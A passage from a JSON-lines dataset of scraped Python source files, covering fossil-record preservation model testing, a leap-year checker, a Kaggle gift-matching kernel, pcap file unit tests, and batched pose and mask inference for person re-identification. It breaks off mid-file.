fossil_complete=[fossil_complete[i] for i in range(len(fossil_complete)) if np.max(fossil_complete[i])-np.min(fossil_complete[i])>0.1] # remove too short branches\n \n if len(fossil_complete) > 1:\n print(\"Using\",len(fossil_complete),\"species for model testing\")\n else:\n sys.exit(\"The number of lineages meeting the requirements for model testing is insufficient.\")\n \n max_time_range_fossils = np.max([np.max(i) for i in fossil_complete])\n min_time_range_fossils = np.min([np.min(i) for i in fossil_complete])\n \n if q_shift==0: \n q_shift = [min_time_range_fossils+ (max_time_range_fossils-min_time_range_fossils)/2.]\n else: \n q_shift = np.array(q_shift)+0\n \n times_q_shift = np.sort(np.array(list(q_shift)+ [ np.maximum(np.max(q_shift),max_time_range_fossils)*10 ] +[0]))[::-1]\n # print(times_q_shift) #, [min_time_range_fossils+ (max_time_range_fossils-min_time_range_fossils)/2.]\n #print np.ones(len(times_q_shift)-1)\n\n occs_sp_bin =list()\n for i in range(len(fossil_complete)):\n occs_temp = fossil_complete[i]\n h = np.histogram(occs_temp[occs_temp>0],bins=np.sort( times_q_shift ))[0][::-1]\n occs_sp_bin.append(h) \n # optimize rate\n # resHPP = est_s_e_q(fossil_complete,occs_sp_bin,model=0,exp_se=0)\n # if verbose ==1: print \"HPP max likelihood:\", resHPP[0], \"q rate:\", abs(resHPP[1])\n resHPPm = est_s_e_q(fossil_complete,occs_sp_bin,model=0,exp_se=1)\n if verbose ==1: print(\"HPP* max likelihood:\", np.round(resHPPm[0],2), \"q rate:\", np.abs(resHPPm[1]))\n # resTPP = est_s_e_q(fossil_complete,occs_sp_bin,model=2,q_shift_times=times_q_shift,exp_se=0)\n # if verbose ==1: print \"TPP max likelihood:\", resTPP[0],\"q rates:\", abs(np.array(resTPP[1]))\n resTPPm = est_s_e_q(fossil_complete,occs_sp_bin,model=2,q_shift_times=times_q_shift,exp_se=1)\n if verbose ==1: print(\"TPP* max likelihood:\", np.round(resTPPm[0],2),\"q rates:\", np.abs(np.array(resTPPm[1])))\n resNHPP = est_s_e_q(fossil_complete,occs_sp_bin,model=1)\n #if verbose ==1: print \"NHPP max likelihood:\", resNHPP[0],\"q rate:\", abs(resNHPP[1])\n \n # ADD SAMPLING OF TS (NHPP)\n def update_multiplier_proposal(i,d=1.2):\n u = np.random.uniform(0,1)\n l = 2*np.log(d)\n m = np.exp(l*(u-.5))\n ii = i * m\n return ii, np.sum(np.log(m))\n\n def get_TSTEvalues(x,q=0.5,n=1000):\n min_te = np.min(x)\n addteA = 0.05*min_te\n max_ts = np.max(x)\n addtsA = 0.05*max_ts\n teAvector = []\n tsAvector = []\n postA = -np.inf\n hast=0\n for it in range(n):\n addte=0.\n addte, hast1 = update_multiplier_proposal(addteA,d=1.2)\n addts=0.\n addts, hast2 = update_multiplier_proposal(addtsA,d=1.2)\n hast = hast1+hast2\n lik = NHPP_lik(x,q,(max_ts+addts),(min_te-addte)) \n r = np.log(np.random.random())\n if lik - postA +hast >= r and (min_te-addte)>0: # only accept if te > 0\n #print lik,hast, postA, r\n postA=lik + 0\n addteA=addte + 0\n addtsA=addts + 0\n if it % 10==0 and it>100:\n #print it, postA,lik, s, min_te-addteA,q,addte\n teAvector.append(min_te-addteA)\n tsAvector.append(max_ts+addtsA)\n return [np.mean(tsAvector),np.mean(teAvector)]\n\n liknhpp_Exp =0\n mean_rate = np.abs(resNHPP[1])\n for i in range(len(fossil_complete)):\n x = fossil_complete[i]\n #est_s = optim_se_given_q_NHPP(x,resNHPP[1])[1]\n [ts,te] = get_TSTEvalues(x,q=mean_rate,n=10000)\n liknhpp_Exp += NHPP_lik(x,mean_rate,ts,te)\n try: # compatibility with older numpy/scipy versions\n if len(liknhpp_Exp):\n liknhpp_Exp = liknhpp_Exp[0]\n except:\n pass\n if verbose ==1: print(\"NHPP* max likelihood:\", np.round(liknhpp_Exp,2),\"q rate:\",mean_rate,\"\\n\")\n \n # get AICc scores\n Liks = np.array([resHPPm[0],liknhpp_Exp,resTPPm[0]])\n DFs = np.array([1, 1, len(resTPPm[1])])\n d_size = np.array([len(fossil_complete)]*3)\n AICs, state = calcAICc(Liks,DFs,d_size)\n models = np.array([\"HPP\",\"NHPP\",\"TPP\"])\n best_model = models[AICs==np.min(AICs)]\n other_models = models[models != best_model]\n print(\"models:\", models)\n if state == 1:\n print(\"AICc scores:\", AICs)\n else: \n print(\"AIC scores:\", AICs)\n deltaAICs = AICs-np.min(AICs)\n deltaAICs_ = deltaAICs[deltaAICs>0]\n # empirical thresholds\n dAIC_hpp = [ [0,6.4,0],[0,17.4,0] ]\n dAIC_nhpp = [ [3.8,0,0],[8.,0,2.4] ]\n dAIC_tpp = [ [3.2,6.8,0],[10.6,23.3,0]]\n \n sig = [\"\",\"\"]\n if best_model==\"HPP\":\n if deltaAICs[1] > dAIC_hpp[1][1]: sig = [\"***\", \"***\"] # significance at 1% vs NHPP and TPP\n elif deltaAICs[1] > dAIC_hpp[0][1]: sig = [\"*\", \"***\"]\n else: sig = [\"\",\"***\"]\n if best_model==\"NHPP\":\n if deltaAICs[0] > dAIC_nhpp[1][0]: sig = [\"***\", \"***\"] # significance at 1% vs HPP and TPP\n elif deltaAICs[0] > dAIC_nhpp[0][0]: sig = [\"*\", \"***\"]\n else: sig = [\"\",\"***\"]\n if best_model==\"TPP\":\n if deltaAICs[0] > dAIC_tpp[1][0]: sig = [\"***\"] # significance at 1% vs HPP \n elif deltaAICs[0] > dAIC_tpp[0][0]: sig = [\"*\"]\n \n if deltaAICs[1] > dAIC_tpp[1][1]: sig += [\"***\"] # significance at 1% vs NHPP\n elif deltaAICs[1] > dAIC_tpp[0][1]: sig += [\"*\"]\n \n print(\"\"\"\n --------------------------------------\n Best model: %s\n \n dAIC - %s: %s %s\n dAIC - %s: %s %s\n \n *** indicates significance at P < 0.01\n * indicates significance at P < 0.05\n --------------------------------------\n \"\"\" % (best_model[0], other_models[0], np.round(deltaAICs_[0],3), sig[0], \\\n other_models[1], np.round(deltaAICs_[1],3), sig[1] ))\n \n print(\n \"\"\"\\nTesting the significance of each shift in the TPP model...\n \"\"\"\n )\n times_q_shift = np.sort(np.array(list(q_shift)+ [ np.maximum(np.max(q_shift),max_time_range_fossils)*10 ] +[0]))[::-1]\n d_size = len(fossil_complete)\n \n # full model\n occs_sp_bin =list()\n for i in range(len(fossil_complete)):\n occs_temp = fossil_complete[i]\n h = np.histogram(occs_temp[occs_temp>0],bins=np.sort( times_q_shift ))[0][::-1]\n occs_sp_bin.append(h) \n # resTPPm = est_s_e_q(fossil_complete,occs_sp_bin,model=2,q_shift_times=times_q_shift,exp_se=1,q0_init=[0.5]*(len(times_q_shift)-1))\n aic_temp = calcAICc(resTPPm[0],len(resTPPm[1]),d_size)\n print(\"Full TPP model\")\n print(\"Lik:\", resTPPm[0], \"AICs:\", aic_temp[0])\n ml_est_rates = np.abs(np.array(resTPPm[1]))\n print(\"Q times:\",times_q_shift[1:], \"\\nRates:\", ml_est_rates)\n \n # aic_best = aic_temp\n def remove_one_shift(times_q_shift,ml_est_rates):\n for irm in range(1,len(times_q_shift)-1):\n print(\"\\nRemoving\", times_q_shift[irm])\n times_temp = times_q_shift[times_q_shift != times_q_shift[irm]]\n occs_sp_bin =list()\n for i in range(len(fossil_complete)):\n occs_temp = fossil_complete[i]\n h = np.histogram(occs_temp[occs_temp>0],bins=np.sort( times_temp ))[0][::-1]\n occs_sp_bin.append(h) \n # optimize rate\n q0 = ml_est_rates[ml_est_rates != ml_est_rates[irm]]\n # print(q0)\n resTPPm = est_s_e_q(fossil_complete,occs_sp_bin,model=2,q_shift_times=times_temp,exp_se=1,q0_init = q0)\n aic_temp = calcAICc(resTPPm[0],len(resTPPm[1]),d_size)\n print(\"Lik:\", resTPPm[0],\"AICs:\", aic_temp[0])\n print(\"Q times:\",times_temp[1:], \"\\nRates:\", np.abs(np.array(resTPPm[1])))\n \n remove_one_shift(times_q_shift,ml_est_rates)\n \n\n\n\ndef run_model_testing_n_shifts(Xdata,q_shift=0,min_n_fossils=2,verbose=1):\n # data are shifted by 100\n fossil_complete=[Xdata[i]+0 for i in range(len(Xdata)) if min(Xdata[i])>0 and len(Xdata[i])>=min_n_fossils] # remove extant, and few occs\n fossil_complete=[fossil_complete[i] for i in range(len(fossil_complete)) if np.max(fossil_complete[i])-np.min(fossil_complete[i])>0.1] # remove too short branches\n \n if len(fossil_complete) > 1:\n pass #print(\"Using\",len(fossil_complete),\"species for model testing\")\n else:\n sys.exit(\"The number of lineages meeting the requirements for model testing is insufficient.\")\n \n max_time_range_fossils = max([max(i) for i in fossil_complete])\n min_time_range_fossils = min([min(i) for i in fossil_complete])\n \n if q_shift==0: \n q_shift = [min_time_range_fossils+ (max_time_range_fossils-min_time_range_fossils)/2.]\n else: \n q_shift = np.array(q_shift)+0\n \n print(\n \"\"\"\\nTesting the significance of each shift in the TPP model...\n \"\"\"\n )\n times_q_shift = np.sort(np.array(list(q_shift)+ [ np.maximum(np.max(q_shift),max_time_range_fossils)*10 ] +[0]))[::-1]\n d_size = len(fossil_complete)\n \n # full model\n occs_sp_bin =list()\n for i in range(len(fossil_complete)):\n occs_temp = fossil_complete[i]\n h = np.histogram(occs_temp[occs_temp>0],bins=np.sort( times_q_shift ))[0][::-1]\n occs_sp_bin.append(h) \n # resTPPm = est_s_e_q(fossil_complete,occs_sp_bin,model=2,q_shift_times=times_q_shift,exp_se=1,q0_init=[0.5]*(len(times_q_shift)-1))\n aic_temp = calcAICc(resTPPm[0],len(resTPPm[1]),d_size)\n print(\"\\nLik:\", resTPPm[0], \"AICs:\", aic_temp[0])\n ml_est_rates = np.abs(np.array(resTPPm[1]))\n print(\"Q times:\",times_q_shift[1:], \"\\nRates:\", ml_est_rates)\n \n # aic_best = aic_temp\n def remove_one_shift(times_q_shift,ml_est_rates):\n list_shifts=[]\n list_rates =[]\n list_AICs = []\n for irm in range(1,len(times_q_shift)-1):\n print(\"\\nRemoving\", times_q_shift[irm])\n times_temp = times_q_shift[times_q_shift != times_q_shift[irm]]\n occs_sp_bin =list()\n for i in range(len(fossil_complete)):\n occs_temp = fossil_complete[i]\n h = np.histogram(occs_temp[occs_temp>0],bins=np.sort( times_temp ))[0][::-1]\n occs_sp_bin.append(h) \n # optimize rate\n q0 = ml_est_rates[ml_est_rates != ml_est_rates[irm]]\n # print(q0)\n resTPPm = est_s_e_q(fossil_complete,occs_sp_bin,model=2,q_shift_times=times_temp,exp_se=1,q0_init = q0)\n aic_temp = calcAICc(resTPPm[0],len(resTPPm[1]),d_size)\n print(\"Lik:\", resTPPm[0],\"AICs:\", aic_temp[0])\n print(\"Q times:\",times_temp[1:], \"\\nRates:\", np.abs(np.array(resTPPm[1])))\n list_AICs.append( aic_temp[0][0] )\n list_shifts.append( times_temp[0][0] )\n list_rates.append( np.abs(np.array(resTPPm[1])) )\n \n print(list_AICs,list_shifts,list_rates)\n return list_AICs[np.argmin(list_AICs)], list_shifts[np.argmin(list_AICs)], list_rates[np.argmin(list_AICs)]\n \n # while True:\n minAIC, bestTimes, bestRates = remove_one_shift(times_q_shift,ml_est_rates)\n # print((minAIC, aic_best))\n # if minAIC - aic_best > 4:\n # print(\"break\", minAIC, aic_best)\n # #if minAIC < aic_best:\n # aic_best = minAIC\n # times_q_shift = bestTimes\n # ml_est_rates = bestRates\n","repo_name":"dsilvestro/PyRate","sub_path":"pyrate_lib/PPmodeltest.py","file_name":"PPmodeltest.py","file_ext":"py","file_size_in_byte":17670,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"57"} +{"seq_id":"1169764062","text":"\r\ndef is_year_leap(year):\r\n\r\n if (year%4 == 0 and year%100 != 0) or year%400 == 0:\r\n leap = True\r\n else:\r\n leap = False\r\n\r\n return leap\r\n\r\nyear = int(input(\"Type a year, for leap checking:\"))\r\n\r\nif is_year_leap(year) == False:\r\n print (\"Year \" + str(year) + \" isn't leap\")\r\n\r\nif is_year_leap(year):\r\n print (\"Year \" + str(year) + \" is leap\")\r\n\r\ntest_data = [1900, 2000, 2016, 1987]\r\ntest_results = [False, True, True, False]\r\nfor i in range(len(test_data)):\r\n\tyr = test_data[i]\r\n\tprint(yr,\"->\",end=\"\")\r\n\tresult = is_year_leap(yr)\r\n\tif result == test_results[i]:\r\n\t\tprint(\"OK\")\r\n\telse:\r\n\t\tprint(\"Failed\")","repo_name":"vasylw/python","sub_path":"IsYearLeap.py","file_name":"IsYearLeap.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"71328529777","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n\n# For example, here's several helpful packages to load in \n\n\n\nimport numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\nfrom collections import Counter\n\nimport tqdm\n\n\n\n# Input data files are available in the \"../input/\" directory.\n\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\n\n\nfrom subprocess import check_output\n\nprint(check_output([\"ls\", \"../input\"]).decode(\"utf8\"))\n\n\n\n# Any results you write to the current directory are saved as output.\nchild_prefs = pd.read_csv('../input/child_wishlist.csv', header=None)\n\nchild_prefs = child_prefs.drop(0, axis=1).values\n\n\n\ngift_prefs = pd.read_csv('../input/gift_goodkids.csv', header=None)\n\ngift_prefs = gift_prefs.drop(0, axis=1).values\nn_children = 1000000 # n children to give\n\nn_gift_type = 1000 # n types of gifts available\n\nn_gift_quantity = 1000 # each type of gifts are limited to this quantity\n\nn_child_pref = 10 # number of gifts a child ranks\n\nn_gift_pref = 1000 # number of children a gift ranks\n\ntwins = 4000\n\nratio_gift_happiness = 2\n\nratio_child_happiness = 2\ndef avg_normalized_happiness(pred, child_prefs, gift_prefs):\n\n \n\n # check if number of each gift exceeds n_gift_quantity\n\n gift_counts = Counter(elem[1] for elem in pred)\n\n for count in gift_counts.values():\n\n assert count <= n_gift_quantity\n\n \n\n # check if twins have the same gift\n\n for t1 in range(0,twins,2):\n\n twin1 = pred[t1]\n\n twin2 = pred[t1+1]\n\n assert twin1[1] == twin2[1]\n\n \n\n max_child_happiness = n_child_pref * ratio_child_happiness\n\n max_gift_happiness = n_gift_pref * ratio_gift_happiness\n\n total_child_happiness = 0\n\n total_gift_happiness = np.zeros(n_gift_type)\n\n \n\n for row in tqdm.tqdm(pred):\n\n child_id = row[0]\n\n gift_id = row[1]\n\n \n\n # check if child_id and gift_id exist\n\n assert child_id < n_children\n\n assert gift_id < n_gift_type\n\n assert child_id >= 0 \n\n assert gift_id >= 0\n\n\n\n child_happiness = (n_child_pref - np.where(child_prefs[child_id]==gift_id)[0]) * ratio_child_happiness\n\n if not child_happiness:\n\n child_happiness = -1\n\n\n\n gift_happiness = ( n_gift_pref - np.where(gift_prefs[gift_id]==child_id)[0]) * ratio_gift_happiness\n\n if not gift_happiness:\n\n gift_happiness = -1\n\n\n\n total_child_happiness += child_happiness\n\n total_gift_happiness[gift_id] += gift_happiness\n\n \n\n # print(max_child_happiness, max_gift_happiness\n\n print('normalized child happiness=',float(total_child_happiness)/(float(n_children)*float(max_child_happiness)) , \\\n\n ', normalized gift happiness',np.mean(total_gift_happiness) / float(max_gift_happiness*n_gift_quantity))\n\n return float(total_child_happiness)/(float(n_children)*float(max_child_happiness)) + np.mean(total_gift_happiness) / float(max_gift_happiness*n_gift_quantity)\ndef pick_first_choice(child_pref, avail_gifts):\n\n \n\n # preference list (of remaining available gifts)\n\n overlap = set(child_pref) & set(avail_gifts)\n\n child_pref_available = [x for x in child_pref if x in overlap] # preserves pref order\n\n \n\n try: # first pick on the list\n\n return child_pref_available[0]\n\n except: # if prefered gifts aren't available, pick first available\n\n return avail_gifts[0]\ngift_matches = []\n\ngift_counter = np.zeros(n_gift_type)\n\n\n\nfor child in tqdm.tqdm(range(n_children)):\n\n\n\n if child < twins:\n\n if child % 2 == 0: # twin 1\n\n avail_gifts = np.where(gift_counter < n_gift_quantity-1)[0]\n\n chosen_gift = pick_first_choice(child_prefs[child], avail_gifts)\n\n else:\n\n # chosen_gift = chosen_gift # pick same as twin 1\n\n pass\n\n \n\n else: # not twins\n\n avail_gifts = np.where(gift_counter < n_gift_quantity)[0]\n\n chosen_gift = pick_first_choice(child_prefs[child], avail_gifts)\n\n\n\n gift_counter[chosen_gift] += 1\n\n gift_matches.append((child, chosen_gift))\navg_normalized_happiness(gift_matches, child_prefs, gift_prefs)\np = pd.DataFrame(gift_matches, columns=['ChildId', 'GiftId']).set_index('ChildId')\n\np.to_csv('nice_inversion_benchmark.csv')","repo_name":"aorursy/new-nb-8","sub_path":"zeemeen_merging-two-kernels-inversion-s-wendy-s.py","file_name":"zeemeen_merging-two-kernels-inversion-s-wendy-s.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"3086413342","text":"__author__ = 'diarmuid'\nimport sys\nsys.path.append(\"..\")\nimport os\n\nimport unittest\nimport AcraNetwork.Pcap as pcap\nimport AcraNetwork.SimpleEthernet as SimpleEthernet\nimport struct\n\ndef getEthernetPacket(data=0xa):\n e = SimpleEthernet.Ethernet()\n e.srcmac = 0x001122334455\n e.dstmac = 0x998877665544\n e.type = SimpleEthernet.Ethernet.TYPE_IP\n e.payload = struct.pack(\"H\",data)\n return e.pack()\n\nclass PcapBasicTest(unittest.TestCase):\n\n def test_missingfilename(self):\n self.assertRaises(TypeError,lambda: pcap.Pcap())\n\n def test_missingreadfile(self):\n self.assertRaises(IOError,lambda: pcap.Pcap(\"nofile.pcap\"))\n\n def test_defaultMagicNumber(self):\n p = pcap.Pcap(\"_tmp.pcap\",mode='w')\n self.assertEqual(p.magic,0xa1b2c3d4)\n\n def test_defaultVersionMaj(self):\n p = pcap.Pcap(\"_tmp.pcap\",mode='w')\n self.assertEqual(p.versionmaj,2)\n\n def test_defaultVersionMin(self):\n p = pcap.Pcap(\"_tmp.pcap\",mode='w')\n self.assertEqual(p.versionmin,4)\n\n def test_readTestFile(self):\n p = pcap.Pcap(\"test_input.pcap\")\n p.readGlobalHeader()\n self.assertEqual(p.magic,0xa1b2c3d4)\n self.assertEqual(p.network,1)\n self.assertEqual(p.sigfigs,0)\n self.assertEqual(p.snaplen,262144)\n self.assertEqual(p.versionmaj,2)\n self.assertEqual(p.versionmin,4)\n self.assertEqual(p.zone,0)\n self.assertEqual(p.filesize,704)\n p.close()\n\n\n\n def test_readARecord(self):\n p = pcap.Pcap(\"test_input.pcap\")\n p.readGlobalHeader()\n mypcaprecord = p.readAPacket()\n self.assertEqual(mypcaprecord.sec,1419678111)\n self.assertEqual(mypcaprecord.usec,811463)\n self.assertEqual(mypcaprecord.orig_len,70)\n self.assertEqual(mypcaprecord.incl_len,70)\n\n def test_writeARecord(self):\n p = pcap.Pcap(\"_tmp.pcap\",mode='w')\n p.writeGlobalHeader()\n r = pcap.PcapRecord()\n r.setCurrentTime()\n r.packet = getEthernetPacket(0xa)\n p.writeARecord(r)\n p.close()\n p = pcap.Pcap(\"_tmp.pcap\")\n p.readGlobalHeader()\n self.assertEqual(p.magic,0xa1b2c3d4)\n self.assertEqual(p.network,1)\n self.assertEqual(p.sigfigs,0)\n self.assertEqual(p.snaplen,65535)\n self.assertEqual(p.versionmaj,2)\n self.assertEqual(p.versionmin,4)\n self.assertEqual(p.zone,0)\n self.assertEqual(p.filesize,56)\n p.close()\n os.remove(\"_tmp.pcap\")\n\n def test_appendARecord(self):\n p = pcap.Pcap(\"_tmp2.pcap\",mode='w')\n p.writeGlobalHeader()\n r = pcap.PcapRecord()\n r.setCurrentTime()\n r.packet = getEthernetPacket(0xa)\n p.writeARecord(r)\n p.close()\n # Now try to append a record\n p = pcap.Pcap(\"_tmp2.pcap\",mode='a')\n r.packet = getEthernetPacket(0xb)\n p.writeARecord(r)\n p.close()\n # Read back to verify\n p = pcap.Pcap(\"_tmp2.pcap\")\n p.readGlobalHeader()\n self.assertEqual(p.filesize,88)\n rec1 = p.readAPacket()\n rec2 = p.readAPacket()\n e = SimpleEthernet.Ethernet()\n e.unpack(rec1.packet)\n self.assertEqual(e.payload,struct.pack(\"H\",0xa))\n e.unpack(rec2.packet)\n self.assertEqual(e.payload,struct.pack(\"H\",0xb))\n p.close()\n os.remove(\"_tmp2.pcap\")\n\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"Python3pkg/AcraNetwork","sub_path":"test/test_pcap.py","file_name":"test_pcap.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"15158928899","text":"import argparse\nimport glob\nimport os\nfrom pathlib import Path\nfrom typing import List\n\nimport cv2\nimport detectron2.data.transforms as T\nimport numpy as np\nimport openpifpaf\nimport torch\nimport tqdm\nfrom detectron2.checkpoint import DetectionCheckpointer\nfrom detectron2.config import CfgNode, get_cfg\nfrom detectron2.model_zoo import get_checkpoint_url, get_config_file\nfrom detectron2.modeling import build_model\nfrom detectron2.structures import Instances\nfrom torch.utils.data import DataLoader, Dataset\n\n\ndef build_config_maskrcnn(model_config_name):\n cfg = get_cfg()\n cfg.merge_from_file(cfg_filename=get_config_file(model_config_name))\n cfg.MODEL.WEIGHTS = get_checkpoint_url(model_config_name)\n cfg.MODEL.DEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'\n return cfg\n\n\ndef compare_arrays(array1, array2):\n \"\"\"\n Compare two arrays and calculate Mean Absolute Error (MAE) and percentage difference.\n\n Args:\n array1 (np.ndarray): First array.\n array2 (np.ndarray): Second array.\n\n Returns:\n mae (float): Mean Absolute Error (MAE) between the arrays.\n mae_percentage (float): Percentage difference between the arrays.\n \"\"\"\n\n def calculate_mae(array1, array2):\n # Calculate Mean Absolute Error (MAE)\n mae = np.mean(np.abs(array1 - array2))\n mae_percentage = (mae / np.max(array1)) * 100\n return mae, mae_percentage\n\n print(f\"Average percentage difference: {calculate_mae(array1, array2)[1]}%\")\n\n\ndef get_image_paths(source, path_format=False):\n \"\"\"\n Get the paths of all image files in a directory.\n\n Args:\n source (str): Directory path.\n path_format (bool, optional): Return paths as Path objects if True, otherwise as strings. Default is False.\n\n Returns:\n image_paths (List[str or Path]): List of image file paths.\n \"\"\"\n image_paths = glob.glob(f\"{source}/**/*.[jJ][pP][gG]\", recursive=True) + \\\n glob.glob(f\"{source}/**/*.[pP][nN][gG]\", recursive=True) + \\\n glob.glob(f\"{source}/**/*.[jJ][pP][eE][gG]\", recursive=True) + \\\n glob.glob(f\"{source}/**/*.[tT][iI][fF]\", recursive=True) + \\\n glob.glob(f\"{source}/**/*.[tT][iI][fF][fF]\", recursive=True)\n if path_format:\n image_paths = [Path(path_str) for path_str in image_paths]\n return image_paths\n\n\ndef format_path(img_path, dataset_dir):\n \"\"\"\n Formats the given image path based on the dataset directory.\n\n Args:\n img_path (str): The path of the image file.\n dataset_dir (str): The directory path of the dataset.\n\n Returns:\n str: The formatted path of the image file.\n \"\"\"\n if \"occluded_reid\" in dataset_dir.lower() or \"occluded-reid\" in dataset_dir.lower():\n return os.path.join(os.path.basename(os.path.dirname(os.path.dirname(img_path))), os.path.basename(img_path))\n elif \"p-dukemtmc_reid\" in dataset_dir.lower() or \"p-dukemtmc-reid\" in dataset_dir.lower():\n return os.path.join(os.path.basename(os.path.dirname(os.path.dirname(os.path.dirname(img_path)))),\n os.path.basename(os.path.dirname(os.path.dirname(img_path))), os.path.basename(img_path))\n return os.path.relpath(img_path, dataset_dir)\n\n\ndef get_label_paths(is_mask, img_paths, dataset_dir):\n \"\"\"\n Get the paths of label files corresponding to the image paths.\n\n Args:\n is_mask (bool): Indicates if the label is a mask or not.\n img_paths (List[str]): List of image file paths.\n dataset_dir (str): Directory path of the dataset.\n\n Returns:\n relative_paths (List[str]): List of relative paths of the image files.\n file_paths (List[str]): List of label file paths.\n \"\"\"\n relative_paths, file_paths = [], []\n for img_name in img_paths:\n relative_path = format_path(img_name, dataset_dir)\n if not is_mask:\n file_path = os.path.join(dataset_dir, \"masks\", \"pifpaf\", relative_path + \".confidence_fields.npy\")\n else:\n file_path = os.path.join(dataset_dir, \"masks\", \"pifpaf_maskrcnn_filtering\", relative_path + \".npy\")\n relative_paths.append(relative_path)\n file_paths.append(file_path)\n return relative_paths, file_paths\n\n\ndef skip_existing(is_mask, imagery, dataset_dir):\n \"\"\"\n Filter out image paths for which label files already exist.\n\n Args:\n is_mask (bool): Indicates if the label is a mask or not.\n imagery (List[str]): List of image file paths.\n dataset_dir (str): Directory path of the dataset.\n\n Returns:\n new_imagery (List[str]): List of image file paths for which label files do not exist.\n \"\"\"\n relative_paths, file_paths = get_label_paths(is_mask=is_mask, img_paths=imagery, dataset_dir=dataset_dir)\n new_imagery = []\n for index, file_path in enumerate(file_paths):\n if not os.path.exists(file_path):\n new_imagery.append(imagery[index])\n return new_imagery\n\n\ndef save_files(files, files_path, verbose=True):\n \"\"\"\n Save files to specified paths.\n\n Args:\n files (List[object]): List of files to be saved.\n files_path (List[str]): List of paths where files will be saved.\n verbose (bool, optional): Print progress if True. Default is True.\n \"\"\"\n for file, file_path in zip(files, files_path):\n os.makedirs(os.path.dirname(file_path), exist_ok=True)\n np.save(file_path, file)\n if verbose:\n print(f\"Processed {os.path.basename(file_path)}\")\n\n\nclass ImageDataset(Dataset):\n \"\"\"\n Custom dataset class for loading images.\n\n Args:\n imagery (List[Path]): List of image file paths.\n\n Returns:\n (str, np.ndarray): Tuple containing the image file path and the loaded image.\n \"\"\"\n\n def __init__(self, imagery: List[Path]):\n self.imagery = imagery\n\n def __getitem__(self, index):\n return self.imagery[index], cv2.imread(str(self.imagery[index]))\n\n def __len__(self):\n return len(self.imagery)\n\n\nclass BatchPifPaf:\n def __init__(self, model_name: str = \"shufflenetv2k16\", batch_size: int = None, workers: int = None):\n \"\"\"\n Initializes a BatchPifPaf object.\n\n Args:\n model_name (str): Name of the OpenPifPaf model to use.\n batch_size (int): Batch size for inference.\n workers (int): Number of workers for data loading.\n \"\"\"\n models = [\n 'resnet50',\n 'shufflenetv2k16',\n 'shufflenetv2k30',\n ]\n assert model_name in models, f\"Model name must be one of {models}\"\n\n print(f\"* OpenPifPaf model -> {model_name}\")\n # Define the OpenPifPaf model\n self.model = openpifpaf.Predictor(checkpoint=model_name, visualize_image=True, visualize_processed_image=True)\n self.batch_size = batch_size if batch_size else self.model.batch_size\n self.workers = workers if workers else self.model.loader_workers if self.model.loader_workers is not None else 0\n self.__collate = openpifpaf.datasets.collate_images_anns_meta\n\n def __call__(self, imagery: List[Path] or List[str], dataset_dir: List[Path] or List[str],\n is_overwrite: bool = False, verbose: bool = False):\n \"\"\"\n Perform batch processing on the given imagery using the OpenPifPaf model.\n\n Args:\n imagery (List[Path] or List[str]): List of image paths or image file names.\n dataset_dir (List[Path] or List[str]): List of dataset directories.\n is_overwrite (bool, optional): Whether to overwrite existing files. Defaults to False.\n verbose (bool, optional): Whether to print verbose information. Defaults to False.\n\n Yields:\n torch.Tensor: Predictions for each image as a NumPy array.\n \"\"\"\n\n assert len(imagery) > 0, \"No images found in imagery.\"\n\n if not is_overwrite:\n imagery = skip_existing(False, imagery, dataset_dir)\n\n dataset = openpifpaf.datasets.ImageList(\n imagery,\n preprocess=self.model.preprocess,\n with_raw_image=True\n )\n loader = DataLoader(\n dataset,\n self.batch_size,\n shuffle=False,\n pin_memory=self.model.device.type != 'cpu',\n num_workers=self.workers,\n collate_fn=self.__collate,\n )\n\n total_batches = len(loader)\n progress_bar = tqdm.tqdm(total=total_batches, desc=\"Processing\", unit=\"batch\")\n\n with torch.no_grad():\n for batch in loader:\n if len(batch) == 3:\n processed_image_batch, gt_anns_batch, meta_batch = batch\n elif len(batch) == 4:\n image_batch, processed_image_batch, gt_anns_batch, meta_batch = batch\n\n # Specify the file path where you want to save the .npy file\n relative_paths, file_paths = get_label_paths(False, [d[\"file_name\"] for d in meta_batch], dataset_dir)\n\n # Obtain the confidence values (pifpaf_conf) for the processed image batch\n pifpaf_conf: torch.Tensor = self.__get_pifpaf_conf(processed_image_batch)\n\n # Save the NumPy array to the .npy file\n save_files(pifpaf_conf.numpy(), file_paths, verbose)\n\n progress_bar.update(1)\n\n progress_bar.close()\n\n def __get_pifpaf_conf(self, processed_image_batch: Instances):\n \"\"\"\n Get the confidence scores from the processed image batch.\n\n Args:\n processed_image_batch (Instances): Processed image batch containing pose estimation fields.\n\n Returns:\n torch.Tensor: Confidence scores for keypoints and connections.\n \"\"\"\n # Retrieve the pose estimation fields from the model processor\n fields_batch = self.model.processor.fields_batch(self.model.model, processed_image_batch,\n device=self.model.device)\n\n # Extract the pif (keypoint) and paf (connection) fields from the batch\n pif, paf = zip(*fields_batch)\n\n # Extract the confidence scores for keypoints (index 1 in each field)\n pif_confidence_scores = torch.stack(pif)[:, :, 1]\n paf_confidence_scores = torch.stack(paf)[:, :, 1]\n\n # Concatenate the confidence scores for keypoints and connections\n pifpaf_confidence_scores = torch.cat((pif_confidence_scores, paf_confidence_scores), dim=1)\n\n # Return the concatenated confidence scores\n return pifpaf_confidence_scores\n\n\nclass BatchMask:\n def __init__(self, cfg: CfgNode or str, batch_size: int = None, workers: int = None):\n \"\"\"\n Initialize the BatchMask class for performing batched instance segmentation using a Mask R-CNN model.\n\n Args:\n cfg (CfgNode or str): Configuration options for the Mask R-CNN model.\n batch_size (int, optional): Batch size for processing images. Defaults to None.\n workers (int, optional): Number of worker processes for data loading. Defaults to None.\n \"\"\"\n # Clone the provided configuration or get a default configuration\n self.cfg = build_config_maskrcnn(cfg) if isinstance(cfg, str) else cfg.clone()\n print(f\"* 